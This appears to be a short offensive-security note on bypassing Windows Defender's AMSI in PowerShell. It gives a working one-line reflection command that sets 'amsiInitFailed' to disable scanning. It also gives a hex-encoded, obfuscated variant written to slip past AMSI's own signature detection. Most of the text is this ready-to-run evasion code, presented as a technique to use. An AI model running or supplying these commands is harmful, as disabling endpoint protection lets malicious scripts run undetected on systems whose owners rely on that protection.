Windows Defender uses a process called AMSI that triggers when a script is run in PowerShell (this includes invocations of IEX for in-memory scripts!).
One bypass for this:
[ REF ] .Assembly.GetType ( ' System.Management.Automation.AmsiUtils ' ) .GetField ( ' amsiInitFailed ' , ' NonPublic,Static ' ) .SetValue ($null,$true)
Note that AMSI uses a regular expression to trap all PowerShell commands that contain AMSI-function related strings, however. This can be bypassed by breaking up the above script into separate variables, or by doing fancy string encoding-and-reassembly tricks.
[ REF ] .Assembly.GetType ( ' System.Management.Automation. ' +$( " 41 6D 73 69 55 74 69 6C 73 " .Split ( " " )| forEach {[ char ]([ convert ] ::toint16 ($ _ , 16 ))}| forEach {$ result =$ result +$ _ };$ result )) .GetField ($( " 61 6D 73 69 49 6E 69 74 46 61 69 6C 65 64 " .Split ( " " )| forEach {[ char ]([ convert ] ::toint16 ($ _ , 16 ))}| forEach {$ result2 =$ result2 +$ _ };$ result2 ), ' NonPublic,Static ' ) .SetValue ($null,$true)
Be aware that AMSI bypasses are per session , not global!